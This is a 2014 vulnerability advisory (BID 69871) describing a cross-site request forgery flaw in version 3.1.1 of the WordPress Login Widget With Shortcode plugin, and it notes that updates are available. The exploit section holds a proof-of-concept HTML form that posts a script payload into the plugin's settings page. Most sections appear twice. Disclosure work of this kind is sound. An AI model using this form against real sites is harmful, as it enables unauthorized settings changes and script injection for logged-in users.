WordPress Login Widget With Shortcode 'options-general.php' Cross Site Request Forgery Vulnerability
BID:69871
Info
WordPress Login Widget With Shortcode 'options-general.php' Cross Site Request Forgery Vulnerability
| Bugtraq ID: | 69871 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 17 2014 12:00AM |
| Updated: | Sep 17 2014 12:00AM |
| Credit: | Tom Adams |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
WordPress Login Widget With Shortcode 'options-general.php' Cross Site Request Forgery Vulnerability
The Login Widget With Shortcode plugin for WordPress is prone to a cross-site request-forgery vulnerability.
An attacker can exploit this issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
Login Widget With Shortcode 3.1.1 is vulnerable; other versions may also be affected.
The Login Widget With Shortcode plugin for WordPress is prone to a cross-site request-forgery vulnerability.
An attacker can exploit this issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
Login Widget With Shortcode 3.1.1 is vulnerable; other versions may also be affected.
Exploit / POC
WordPress Login Widget With Shortcode 'options-general.php' Cross Site Request Forgery Vulnerability
To exploit this issue an attacker must entice an unsuspecting victim to open a malicious URI.
The following example data is available:
<form method="POST" action="http://www.example.com/wp-admin/options-general.php?page=login_widget_afo">
<input type="text" name="custom_style_afo" value="&lt;/textarea>&lt;script>alert(1)&lt;/script>">
<input type="text" name="option" value="login_widget_afo_save_settings">
<input type="submit">
</form>
To exploit this issue an attacker must entice an unsuspecting victim to open a malicious URI.
The following example data is available:
<form method="POST" action="http://www.example.com/wp-admin/options-general.php?page=login_widget_afo">
<input type="text" name="custom_style_afo" value="&lt;/textarea>&lt;script>alert(1)&lt;/script>">
<input type="text" name="option" value="login_widget_afo_save_settings">
<input type="submit">
</form>
Solution / Fix
WordPress Login Widget With Shortcode 'options-general.php' Cross Site Request Forgery Vulnerability
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
WordPress Login Widget With Shortcode 'options-general.php' Cross Site Request Forgery Vulnerability
References:
References: